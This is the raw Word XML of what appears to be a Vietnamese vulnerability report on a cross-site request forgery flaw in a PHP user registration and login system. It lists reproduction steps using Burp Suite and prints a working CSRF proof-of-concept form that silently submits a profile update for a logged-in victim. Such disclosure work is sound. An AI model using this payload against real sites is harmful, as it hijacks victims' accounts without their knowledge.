          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Steps to reprocedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A343B" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở trang đăng nhập người dùng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4592919A" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ăng nhập bằng tài khoản người dùng "kẻ tấn công" và điều hướng đến mục chỉnh sửa tab hồ sơ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E89671" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhấp vào nút "Cập nhật" và chặn yêu cầu trong web công cụ proxy được gọi là "Burpusite"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE02A31" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tạo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">POC </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF7C08" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ãy đăng nhập bằng tài khoản "Nạn nhân/Người dùng bình thường". (Để người dùng đó là hiện đang được xác thực trong trình duyệt).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E061DC3" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Dán URL vào trình duyệt, được sao chép ở bước 3. HOẶC gửi Mã CSRF POC được hiển thị ở bước 3.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0C065" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Chúng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhận được "Status: Success", cho biết cuộc tấn công CSRF đã thành công đã thực hiện thành công </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D1B496" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609CCC9" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01022340" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EF4C3" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;history.pushState('', '', '/')&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0C49E" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;form action="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.26.133</w:t>
      </w:r>
      <w:r w:rsidRPr="004F42E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/users/Users-Registration-and-login-System-With-Admin-Panel-master/profile_action.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> " method="POST"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613B64A" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="fullname" value="Attacker" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D452D5D" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="username" value="hunterr" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA4BFD" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="630"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;input type="hidden" name="email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">value="noooobhunter&amp;#64;gmail&amp;#46;com" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471DE7B" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="gender" value="Male" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F711003" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="action" value="update&amp;#95;user" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F80428B" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="submit" value="Submit request" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6685A749" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F7EBA" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D6BEE" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3069C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B025271" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03218FBF" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="004F42E2" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05044847" wp14:editId="10557DA0">
            <wp:extent cx="5116195" cy="2790908"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="18517173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17378"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1639" cy="2815698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39944BEF" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="004F42E2" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC10E96" wp14:editId="1B595175">
            <wp:extent cx="4829175" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6395580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58050"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4676775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931D67D" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="004F42E2" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C96BB7D" wp14:editId="4DA376E9">
            <wp:extent cx="5351227" cy="1745615"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="86148636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86365"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1388" cy="1748930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE288A" w14:textId="77777777" w:rsidR="009B6D9B" w:rsidRPr="004F42E2" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1315B3F2" wp14:editId="42A50296">
            <wp:extent cx="5510254" cy="1899920"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="155902967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9678" name="Picture 8"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390" cy="1900657"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26388654" w14:textId="19BCC997" w:rsidR="00F07F46" w:rsidRPr="009B6D9B" w:rsidRDefault="009B6D9B" w:rsidP="009B6D9B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42E2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F610CC2" wp14:editId="59334744">
            <wp:extent cx="5495637" cy="3093057"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10375814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1438"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723" cy="3095920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F07F46" w:rsidRPr="009B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52969"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97E00214"/>
    <w:lvl w:ilvl="0" w:tplc="C54229F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:u w:val="none" w:color="00000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74A11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64D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B41CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="186EB146"/>
    <w:lvl w:ilvl="0" w:tplc="C49C3FF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54460">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2064401581">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="40942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9B"/>
    <w:rsid w:val="000C1210"/>
    <w:rsid w:val="0064250C"/>
    <w:rsid w:val="009B6D9B"/>
    <w:rsid w:val="009D7E75"/>
    <w:rsid w:val="00C3632A"/>
    <w:rsid w:val="00DC022E"/>
    <w:rsid w:val="00E0627F"/>
    <w:rsid w:val="00F07F46"/>
    <w:rsid w:val="00F3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1852"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A2966A6C-AEFA-47BA-B97E-60F46C35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9B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009B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9B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009B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9B"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009B6D9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009B6D9B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009B6D9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009B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9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009B6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Hữu Linh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bùi Hữu Linh</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-04T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-04T15:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>